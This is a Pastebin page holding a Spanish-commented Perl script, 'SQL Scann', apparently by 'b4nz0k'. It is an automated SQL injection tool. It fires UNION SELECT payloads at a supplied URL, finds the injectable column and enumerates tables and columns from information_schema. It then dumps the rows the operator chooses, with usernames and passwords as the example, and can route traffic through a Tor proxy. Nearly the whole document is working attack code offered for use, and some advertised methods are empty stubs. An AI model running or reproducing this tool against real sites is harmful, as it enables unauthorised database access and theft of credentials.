Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use HTTP::Request;
- use LWP::UserAgent;
- my $browser = LWP::UserAgent->new();
- unless ($ARGV[0]) { &banner; }
- &variables_ARGV;
- sub variables_ARGV
- {
- #Variables por Default
- $columns_count = 30;
- $end = "+--+";
- $un = "/**/";
- $column_file = "columnas.txt";
- $table_file = "tablas.txt";
- $num_url = "5";
- @dbs;
- @tablas_db;
- #Control de ARGV
- my $i = 0;
- foreach $i (@ARGV)
- {
- if ($ARGV[$i] eq "-c" || $ARGV[$i] eq "--columns" ) { $columns_count = $ARGV[$i+1] }
- if ($ARGV[$i] eq "-u" || $ARGV[$i] eq "--url") { $url = $ARGV[$i+1] }
- if ($ARGV[$i] eq "-px" || $ARGV[$i] eq "--proxy") { $proxy = $ARGV[$i+1] }
- if ($ARGV[$i] eq "-m" || $ARGV[$i] eq "--metod") { $metod = $ARGV[$i+1] }
- if ($ARGV[$i] eq "-tf" || $ARGV[$i] eq "--table_file") { $user_file = $ARGV[$i+1] }
- if ($ARGV[$i] eq "-cf" || $ARGV[$i] eq "--column_file"){ $pass_file = $ARGV[$i+1] }
- if ($ARGV[$i] eq "-h" || $ARGV[$i] eq "--help") {&help}
- $i++;
- }
- }
- #Control de La Url
- unless ($url) { &banner }
- $url = "http://" . $url if $url !~ m/^http\:\/\//;
- if ($url =~ m/^http\:\/\/([a-zA-Z0-9-.]+)\/(.*)\//)
- { $host = $1; $path = $2; }
- if ($url =~ m/(\d+)$/) { $num_url = $1; $leang = length($1); }
- for ($i=1;$i<=$leang; $i++) { chop ($url); }
- &scann;
- # print "$url",$num_url,"\n";
- # exit;
- sub banner {
- print "
- .|'''.| ..|''|| '||'
- ||.. ' .|' || ||
- ''|||. || || ||
- . '|| '|. '. '| || Scann
- |'....|' '|...'|. .||.....|
- C o d e d b y [ b 4 n z 0 k ]
- Modo de Uso:
- perl sql.pl -u 'http://site.com/path/arc.php?vuln=123' <opciones>
- mas informacion >> perl sql.pl -h
- "; print "\n"; exit 1; }
- sub help {
- print "
- ##-- Todas las Opciones no se han Complementado aun...--##
- -u La Url a injectar
- --url ejemplo (-u 'web.com/index.php?id=5')
- -c El Numero de Columnas a Buscar
- --columns ejemplo: -c 5 = 1,2,3,4,5
- defautl: 30
- -px Proxy a usar ejemplo:
- --proxy -px 127.0.0.1:9050
- -m Metodo a Utilizar
- --metod ejemplo metod 1,3,4
- 0 . * SQL (Auto Detect)
- 1 . * MySQL (inject union boolean)
- 2 . * MySQL (order by)
- 3 . * MySQL (bind)
- 4 . * MySQL (error based)
- 5 . * MsSQL (inject)
- 6 . * MsSQL (boolean)
- 7 . * MsSQL (bind)
- 8 . * MsAcces Inject
- 9 . * Oracle Inject
- 10 . * PostgreSQL Inject
- default: Autodetect...
- -h Consulta de los
- --help comandos del script
- "; print "\n"; exit 1;
- }
- unless ($vulnerado) { print "[*] La Web no es Vulnerable\n"; }
- if ($vulnerado) { &tablas_1 }
- sub scann {
- print "
- .|'''.| ..|''|| '||'
- ||.. ' .|' || ||
- ''|||. || || ||
- . '|| '|. '. '| || Scann
- |'....|' '|...'|. .||.....|
- C o d e d b y [ b 4 n z 0 k ]
- "; &sql_1;
- }
- sub sql_1 {
- #############################################
- # SQL union select (Boolean)
- #
- # $columns_count = "30";
- # $end = "+--+";
- # $un = "/**/";
- # $num_url = "5";
- print "\n[*] Escaneando Path...\n"; $table_schema;
- $union = $un ."and" . $un . "1=0" . $un . "union" . $un . "select" . $un;
- $i=1; while ($i<=$columns_count)
- {
- if ($i eq 1) {$cont1.= $i} else {$cont1.=',' . $i} $hex = "99999" . $i ."99999";
- if ($i eq 1) {$cont2.="concat(0x62346e7a306b,$hex)";}
- else {$cont2.=',' . "concat(0x62346e7a306b,$hex)";}
- $path = $url . $num_url . $union . $cont2;
- my $request = $browser->get($path . $end);
- my $content = $request->content;
- if ($content =~ m/b4nz0k99999(\d+)99999/)
- { print "[*] Web Vulnerada en la Columna [$1]\n[*] CoLumna en el Numero [" . $i . "]\n";
- $vulnerado = "Si"; $num_columns = $i; $inject_columns = $1;
- last; unless ($vulnerado) { &tablas_1; }
- } $i++;
- } # print "$cont1\n";
- }
- sub tablas_1 { ################--Group_Concat--############
- print "\n[*] Selecciona el modo\n\t1 todas las tablas\n\t2 Tabla por tabla (Recomendado) \n\t";
- $concat = <STDIN>; chop ($concat);
- goto concat_1 if ($concat =~ m/1/); goto concat_2 if ($concat =~ m/2/);
- concat_1:
- for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont);
- $cont =~ s /$inject_columns/group_concat(0x62346e7a306b,table_name,0x62346e7a306b)/g;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . "information_schema.tables" . $end;
- my $request = $browser->get($p1);
- my $content = $request->content;
- if ($content =~ m/b4nz0k(.*)b4nz0k/)
- { $tablass = $1; @split_tablas = split ("b4nz0k",$tablass);
- print "\n\t####--Datos Schema--####\n\n";foreach $n (@split_tablas)
- { push (@tablas_db,$n); print "[ $n ]\n" if $n =~ m/([a-zA-Z0-9-.]+)/; }
- print "\n\n"; $b=$num_columns;
- }
- ###############--Concat--############
- else {
- concat_2:
- $cont=""; for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont);
- $cont =~ s /$inject_columns/concat(0x62346e7a306b,table_name,0x62346e7a306b,table_schema,0x62346e7a306b)/g;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . "information_schema.tables" . $un . "limit" . $un;
- $d=0; while ($d <= 99999)
- { my $request = $browser->get($p1 . $d . ",1" . $end);
- my $content = $request->content;
- if ($content =~ m/b4nz0k(.*)b4nz0k(.*)b4nz0k/) {
- $table_schema = $2 and push (@dbs,$table_schema) and print "\n\t[ # $table_schema # ]\n" if $table_schema != $2;
- print "[ $1 ]\n"; push (@tablas_db,$1); }
- else { print "[*] Sin Permisos para la Base de Datos Schema\n" if $d <= 1; $d=99999; } $d++;
- } &columnas_1; } &columnas_1;
- }
- sub columnas_1 {
- columnas_1:
- $tablaa = ""; print "[*] Escriba la tabla que desea consultar: ";
- $tablaa = <STDIN>; chop ($tablaa); $ascci="";
- @array_ascci = split (//,$tablaa); print "\t[##--$tablaa--##]\n";
- foreach $i (@array_ascci)
- { $ascci = $ascci . ord($i) . ","; } chop ($ascci);
- $cont=""; for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont);
- $cont =~ s /$inject_columns/group_concat(0x62346e7a306b,column_name,0x62346e7a306b)/g;
- $wheere ="information_schema.columns" . $un . "where" . $un . "table_name=char(" . $ascci . ")" . $end;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . $wheere;
- # print "$p1\n"; exit;
- my $request = $browser->get($p1 . $d . ",1" . $end);
- my $content = $request->content;
- if ($content =~ m/b4nz0k(.*)b4nz0k/) {
- $columnass = $1; @split_columnas = split ("b4nz0k",$columnass);
- print "\n\t####--$tablaa--####\n\n"; $n=""; foreach $n (@split_columnas)
- { print "[ $n ]\n" if $n =~ m/([a-zA-Z0-9-.]+)/; }
- print "\n\n";
- }
- datos_1:
- $cont=""; for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont); $s; $nn = "";
- print "[*] Escriba los datos a consultar: \n"; print "[* Ejemplo] usuario,password : ";
- $tablaa2 = <STDIN>; chop ($tablaa2); @dataa = split (",",$tablaa2); print "\n\t[##--$tablaa2--##]\n";
- @dataa = split(",",$tablaa2); foreach $nn (@dataa) { $s.= $nn . ",0x62346e7a306b,"; } chop ($s);
- $cont =~ s /$inject_columns/concat(0x62346e7a306b,$s)/g;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . $tablaa . $un . "limit" . $un;
- # print "$p1\n";
- for ($x=0;$x<=$columns_count;$x++) {
- my $request = $browser->get($p1 . $x . ",1" . $end );
- my $content = $request->content;
- if ($content =~ m/b4nz0k(.*)b4nz0k(.*)b4nz0k/) {
- print "[ $1\t:: $2 ]\n"; }
- else { print "[*] Usuarios sin Permisos para estos datos \n" if $x==0; $x = $columns_count; }
- print "\n";
- }
- }
- sub sql_3 {
- #############################################
- # SQL - Bind (Brute Force)
- #
- # $columns_count = 30;
- # $end = "+--+";
- # $un = "/**/";
- # $num_url = "5";
- print "[*] SQL Bind Inject\n";
- $union = $un ."and" . $un . "1=0" . $un . "union" . $un . "select" . $un;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement